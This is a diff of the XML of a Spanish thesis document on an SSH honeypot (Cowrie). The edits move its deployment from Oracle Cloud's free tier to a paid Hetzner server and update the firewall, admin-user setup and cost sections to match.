@@ -11917,6 +11951,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11953,6 +11988,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11964,7 +12000,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Oracle Cloud Infrastructure (OCI)</w:t>
+        <w:t xml:space="preserve">Hetzner Cloud</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11983,12 +12019,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Plataforma cloud de Oracle que ofrece un tier Always Free con instancias ARM (Ampere A1.Flex) de hasta 4 OCPU y 24 GB de RAM sin coste. En este proyecto se utiliza una instancia con 1 OCPU y 6 GB de RAM ejecutando Ubuntu Server 24.04 LTS. La IP pública proporcionada por OCI permite exponer el honeypot a Internet de forma directa.</w:t>
+        <w:t xml:space="preserve">Proveedor cloud europeo en el que se ha desplegado el honeypot. Se utiliza un servidor CX23 (2 vCPU x86 compartidas, 4 GB de RAM y 40 GB de disco) en el centro de datos de Núremberg (Alemania), con Ubuntu Server 24.04 LTS y una dirección IPv4 pública asignada directamente a su interfaz de red. Delante del servidor se configura el Cloud Firewall de Hetzner, que solo admite tráfico entrante TCP a los puertos 22 y 2022 e ICMP. El acceso a la consola está protegido con autenticación en dos pasos, y el servidor se creó con una clave SSH dedicada exclusivamente al proyecto.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12002,7 +12039,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Disponibilidad de Capacidad</w:t>
+        <w:t xml:space="preserve">Plan Inicial y Cambio de Proveedor</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12021,12 +12058,51 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Las instancias A1.Flex gratuitas son muy demandadas y la región de Madrid respondía de forma sistemática con el error «Out of host capacity». Se valoraron tres alternativas: la instancia gratuita VM.Standard.E2.1.Micro (AMD, 1 GB de RAM), que no aparecía disponible para la cuenta en esa región; el paso a una cuenta Pay As You Go, descartado por exigir una retención temporal de unos 93 € en la tarjeta; y la creación automatizada de la instancia mediante la API de OCI. Se optó por la tercera: el script oci_a1_retry.py, desarrollado con el SDK oficial de Oracle para Python, localiza el dominio de disponibilidad, la imagen Ubuntu 24.04 ARM y la subnet pública, y solicita la instancia cada minuto hasta que hay capacidad, respetando los avisos de limitación de peticiones de la API.</w:t>
+        <w:t xml:space="preserve">El anteproyecto preveía desplegar el servidor en el tier gratuito de Oracle Cloud Infrastructure (OCI), que ofrece instancias ARM (Ampere A1.Flex) de hasta 4 OCPU y 24 GB de RAM sin coste. Sin embargo, estas instancias son muy demandadas y la región de Madrid respondía de forma sistemática con el error «Out of host capacity».</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Para intentar obtenerla se desarrolló el script oci_a1_retry.py, que, con el SDK oficial de Oracle para Python, solicitaba la instancia cada minuto (véase el capítulo de Implementación). Tras más de 600 intentos a lo largo de más de un día sin éxito, se valoraron las alternativas gratuitas: la otra instancia gratuita de Oracle (VM.Standard.E2.1.Micro), que no aparecía disponible para la cuenta en la región; el paso a una cuenta de pago de Oracle, que exigía una retención temporal en la tarjeta; Azure for Students, cuya verificación automática no reconoce el dominio de correo del centro; y el nuevo plan gratuito con crédito de AWS, al que no tenía derecho una cuenta creada antes de julio de 2025.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Agotadas las opciones gratuitas, se eligió Hetzner Cloud por tres motivos: el precio cerrado y bajo de sus servidores pequeños, la facturación por horas sin permanencia (el servidor se elimina al terminar el proyecto) y la disponibilidad inmediata. Gracias a que todo el despliegue está automatizado con scripts genéricos para Ubuntu 24.04, el cambio de proveedor solo afectó a la creación de la máquina; los scripts únicamente se adaptaron para que los mensajes no mencionaran Oracle y para crear el usuario administrador cuando el proveedor solo entrega acceso como root, como ocurre en Hetzner.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12059,7 +12135,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Oracle se reserva el derecho de recuperar las instancias Always Free que considera ociosas: aquellas que durante 7 días mantienen a la vez un uso de CPU inferior al 20 % (percentil 95), un uso de red inferior al 20 % y, en las instancias A1, un uso de memoria inferior al 20 % (Oracle, s. f.-a). Un honeypot de media interacción cumple las tres condiciones, ya que Cowrie consume muy pocos recursos, por lo que la instancia corría el riesgo de ser recuperada en mitad del periodo de captura.</w:t>
+        <w:t xml:space="preserve">Mientras Oracle era la plataforma prevista, se analizó además su política de recuperación de instancias ociosas. Oracle se reserva el derecho de recuperar las instancias Always Free que considera ociosas: aquellas que durante 7 días mantienen a la vez un uso de CPU inferior al 20 % (percentil 95), un uso de red inferior al 20 % y, en las instancias A1, un uso de memoria inferior al 20 % (Oracle, s. f.-a). Un honeypot de media interacción cumple las tres condiciones, ya que Cowrie consume muy pocos recursos, por lo que la instancia corría el riesgo de ser recuperada en mitad del periodo de captura.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12078,12 +12154,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Dado que las tres condiciones deben cumplirse simultáneamente, basta con evitar una de ellas. Se desarrolló un pequeño servicio, oci-keepalive, que reserva el 25 % de la memoria RAM y la mantiene ocupada sin consumir CPU. El servicio se ejecuta con un usuario efímero sin privilegios, sin acceso a la red ni al sistema de ficheros, y con el uso de swap deshabilitado para garantizar que la reserva permanezca en memoria física. Se descartó la alternativa de generar carga de CPU artificial por ser un consumo innecesario de recursos compartidos.</w:t>
+        <w:t xml:space="preserve">Dado que las tres condiciones deben cumplirse simultáneamente, basta con evitar una de ellas. Se desarrolló un pequeño servicio, oci-keepalive, que reserva el 25 % de la memoria RAM y la mantiene ocupada sin consumir CPU. El servicio se ejecuta con un usuario efímero sin privilegios, sin acceso a la red ni al sistema de ficheros, y con el uso de swap deshabilitado para garantizar que la reserva permanezca en memoria física. Se descartó la alternativa de generar carga de CPU artificial por ser un consumo innecesario de recursos compartidos. En el despliegue final en Hetzner esta política no existe, y el script de instalación no activa el servicio: lo reserva para instancias A1 de Oracle, que detecta por la etiqueta de chasis OracleCloud.com del sistema.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12120,6 +12197,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12156,6 +12234,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12192,6 +12271,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12267,6 +12347,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12299,7 +12380,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">La planificación inicial del proyecto contemplaba UFW (Uncomplicated Firewall) como firewall del host, por ser la herramienta habitual en Ubuntu y por su sintaxis sencilla. UFW no es un firewall distinto, sino una capa de gestión que genera reglas de iptables. Durante la preparación del despliegue se analizó la imagen de Ubuntu que proporciona Oracle Cloud y se decidió prescindir de UFW por tres motivos.</w:t>
+        <w:t xml:space="preserve">La planificación inicial del proyecto contemplaba UFW (Uncomplicated Firewall) como firewall del host, por ser la herramienta habitual en Ubuntu y por su sintaxis sencilla. UFW no es un firewall distinto, sino una capa de gestión que genera reglas de iptables. Durante la preparación del despliegue, entonces previsto en Oracle Cloud, se analizó la imagen de Ubuntu de esa plataforma y se decidió prescindir de UFW por tres motivos.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12318,7 +12399,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">En primer lugar, la imagen de Oracle ya incluye un conjunto de reglas de iptables persistentes en /etc/iptables/rules.v4, que terminan con un rechazo general del tráfico entrante e incluyen reglas para los servicios internos de la plataforma en el rango 169.254.0.0/16. Activar UFW sobre esa base supondría tener dos gestores escribiendo en las mismas tablas, una fuente habitual de errores difíciles de diagnosticar, como abrir un puerto en UFW y que el tráfico siga bloqueado por una regla previa de Oracle.</w:t>
+        <w:t xml:space="preserve">En primer lugar, la imagen de Oracle ya incluye un conjunto de reglas de iptables persistentes en /etc/iptables/rules.v4, que terminan con un rechazo general del tráfico entrante e incluyen reglas para los servicios internos de la plataforma en el rango 169.254.0.0/16. Activar UFW sobre esa base supondría tener dos gestores escribiendo en las mismas tablas, una fuente habitual de errores difíciles de diagnosticar, como abrir un puerto en UFW y que el tráfico siga bloqueado por una regla previa de Oracle. En el despliegue final en Hetzner la imagen no trae reglas previas, pero sí UFW instalado e inactivo; al instalar iptables-persistent, el gestor de paquetes desinstaló UFW automáticamente por ser incompatibles, lo que confirma que ambas herramientas no deben convivir.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12356,12 +12437,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Un detalle de esta configuración es que el firewall del host debe aceptar el puerto 2222 aunque no se exponga a Internet. La redirección se aplica en la cadena PREROUTING, antes del filtrado, de modo que el paquete llega a la cadena INPUT con el puerto de destino ya cambiado a 2222. El puerto sigue siendo inaccesible desde el exterior porque la Security List de OCI solo admite el 22 y el 2022.</w:t>
+        <w:t xml:space="preserve">Un detalle de esta configuración es que el firewall del host debe aceptar el puerto 2222 aunque no se exponga a Internet. La redirección se aplica en la cadena PREROUTING, antes del filtrado, de modo que el paquete llega a la cadena INPUT con el puerto de destino ya cambiado a 2222. El puerto sigue siendo inaccesible desde el exterior porque el Cloud Firewall de Hetzner solo admite el 22 y el 2022.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12524,6 +12606,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -12542,6 +12625,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -12635,6 +12719,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -13013,7 +13098,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">En curso</w:t>
+              <w:t xml:space="preserve">Completada</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13120,7 +13205,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Pendiente</w:t>
+              <w:t xml:space="preserve">En curso</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13880,6 +13965,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -13910,7 +13996,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El proyecto se ejecuta íntegramente con herramientas gratuitas y de código abierto:</w:t>
+        <w:t xml:space="preserve">El proyecto utiliza únicamente software libre o gratuito; el único coste es el servidor cloud:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -14019,7 +14105,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Servidor Oracle Cloud (A1.Flex)</w:t>
+              <w:t xml:space="preserve">Servidor Hetzner Cloud CX23 + IPv4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14040,28 +14126,28 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">0 €</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Always Free tier</w:t>
+              <w:t xml:space="preserve">7,25 €/mes</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">IVA incluido</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14474,7 +14560,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Total</w:t>
+              <w:t xml:space="preserve">Total estimado</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14495,28 +14581,28 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">0 €</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"/>
+              <w:t xml:space="preserve">≈ 15 €</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Unos 2 meses de servidor</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14551,12 +14637,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El coste total del proyecto en software e infraestructura es de cero euros. El único recurso invertido es el tiempo del alumno, estimado en 109 horas.</w:t>
+        <w:t xml:space="preserve">Todo el software empleado es libre o gratuito. El único coste económico es el servidor cloud: 6,64 € al mes por el servidor CX23 y 0,61 € por la dirección IPv4, IVA incluido, facturados por horas. Está previsto mantenerlo unos dos meses (despliegue, captura y análisis) y eliminarlo después, junto con su dirección IP, para que deje de facturarse. El anteproyecto contemplaba un coste nulo al usar el tier gratuito de Oracle Cloud; el cambio de proveedor se explica en el capítulo de Tecnología. A ello se suma el tiempo del alumno, estimado en 109 horas.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -14836,6 +14923,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -17024,6 +17112,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -17055,12 +17144,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Este capítulo describe cómo se ha construido el sistema: los scripts que llevan un servidor Ubuntu recién creado hasta un honeypot operativo, la configuración de Cowrie, los servicios de systemd, el script de análisis y la herramienta de aprovisionamiento desarrollada para obtener la instancia en Oracle Cloud. Todo el código se encuentra en el repositorio del proyecto y los ficheros de configuración completos se reproducen en los anexos.</w:t>
+        <w:t xml:space="preserve">Este capítulo describe cómo se ha construido el sistema: los scripts que llevan un servidor Ubuntu recién creado hasta un honeypot operativo, la configuración de Cowrie, los servicios de systemd, el script de análisis y la herramienta de aprovisionamiento desarrollada para intentar obtener la instancia en Oracle Cloud, la plataforma prevista inicialmente. Todo el código se encuentra en el repositorio del proyecto y los ficheros de configuración completos se reproducen en los anexos.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -17250,7 +17340,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Consola de OCI</w:t>
+              <w:t xml:space="preserve">Consola del proveedor</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17272,7 +17362,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Abrir 2022/TCP en la Security List</w:t>
+              <w:t xml:space="preserve">Cloud Firewall con entrada TCP 22, TCP 2022 e ICMP</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17362,7 +17452,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Actualizaciones, swap, firewall iptables y SSH real en el puerto 2022</w:t>
+              <w:t xml:space="preserve">Usuario administrador, actualizaciones, swap, firewall iptables y SSH real en el puerto 2022</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17384,7 +17474,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">El usuario tiene clave pública; el 2022 está abierto en OCI</w:t>
+              <w:t xml:space="preserve">Hay una clave autorizada; el 2022 está abierto en el firewall del proveedor</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17610,6 +17700,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -17646,6 +17737,46 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Usuario Administrador</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Como el script prohíbe el acceso SSH como root, antes debe existir un usuario administrador con una clave autorizada; de lo contrario, el administrador se quedaría fuera del servidor. Oracle y AWS entregan sus máquinas con un usuario ubuntu, pero Hetzner solo permite entrar como root. El script detecta el caso: si se ejecuta con sudo usa el usuario que lo invoca; si existe ubuntu con clave, usa ese; y si solo hay root, crea un usuario nuevo (diego en este proyecto), le copia la clave autorizada de root con los permisos correctos (700 para el directorio .ssh y 600 para el fichero), lo añade al grupo sudo y le pide una contraseña que solo se usará para sudo, ya que el acceso SSH sigue siendo exclusivamente por clave. Para poder relanzar el script tras un fallo, la contraseña solo se solicita si el usuario aún no tiene una.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -17755,7 +17886,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El fichero establece el puerto 2022, la autenticación exclusiva por clave pública (AuthenticationMethods publickey), la prohibición del acceso como root, la restricción a un único usuario administrador (AllowUsers) y límites de tres intentos y 30 segundos para autenticarse. Antes de reiniciar el servicio se valida la sintaxis con sshd -t; si falla, el script elimina el fichero y se detiene sin tocar el servicio en ejecución.</w:t>
+        <w:t xml:space="preserve">El fichero establece el puerto 2022, la autenticación exclusiva por clave pública (AuthenticationMethods publickey), la prohibición del acceso como root, la restricción a un único usuario administrador (AllowUsers) y límites de tres intentos y 30 segundos para autenticarse. Antes de reiniciar el servicio se valida la sintaxis con sshd -t; si falla, el script elimina el fichero y se detiene sin tocar el servicio en ejecución. Esta validación necesita que exista el directorio /run/sshd, que en Ubuntu 24.04 solo se crea mientras el servicio está en marcha; por eso el script lo crea antes de validar (véase la incidencia correspondiente en el capítulo de Pruebas).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17780,6 +17911,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -17812,7 +17944,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El script detecta si la cadena INPUT ya termina en una regla de rechazo, como ocurre en las imágenes de Oracle. Si no es así, construye la base de una política restrictiva: aceptar el tráfico de conexiones establecidas, la interfaz de loopback, ICMP y el puerto 22, y rechazar todo lo demás. Sobre esa base inserta la regla que abre el 2022 y guarda el conjunto con netfilter-persistent. El puerto 22 se mantiene abierto en este paso porque la sesión del administrador sigue entrando por él hasta que se complete el despliegue.</w:t>
+        <w:t xml:space="preserve">El script detecta si la cadena INPUT ya termina en una regla de rechazo, como ocurre en las imágenes de Oracle. Si no es así, como en Hetzner, construye la base de una política restrictiva: aceptar el tráfico de conexiones establecidas, la interfaz de loopback, ICMP y el puerto 22, y rechazar todo lo demás. Sobre esa base inserta la regla que abre el 2022 y guarda el conjunto con netfilter-persistent. El puerto 22 se mantiene abierto en este paso porque la sesión del administrador sigue entrando por él hasta que se complete el despliegue.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17914,6 +18046,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -17931,6 +18064,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -17988,6 +18122,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -18719,6 +18854,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -18757,6 +18893,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -18795,6 +18932,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -18827,12 +18965,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">En instancias A1, el script de instalación activa además el servicio oci-keepalive (Anexo E), descrito en el apartado de Tecnología. Su implementación tiene un detalle técnico relevante: reservar memoria con bytearray() en Python no basta, porque Linux no asigna páginas físicas a memoria que solo se ha reservado y nunca se ha escrito. El programa escribe un byte en cada página de 4 KB para que toda la reserva ocupe RAM real, y el servicio prohíbe el uso de swap (MemorySwapMax=0), ya que la memoria movida a swap no contaría como utilizada.</w:t>
+        <w:t xml:space="preserve">En instancias A1 de Oracle, el script de instalación activa además el servicio oci-keepalive (Anexo E), descrito en el apartado de Tecnología; en el despliegue final en Hetzner no se activa. Su implementación tiene un detalle técnico relevante: reservar memoria con bytearray() en Python no basta, porque Linux no asigna páginas físicas a memoria que solo se ha reservado y nunca se ha escrito. El programa escribe un byte en cada página de 4 KB para que toda la reserva ocupe RAM real, y el servicio prohíbe el uso de swap (MemorySwapMax=0), ya que la memoria movida a swap no contaría como utilizada.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -18917,6 +19056,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -19626,6 +19766,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
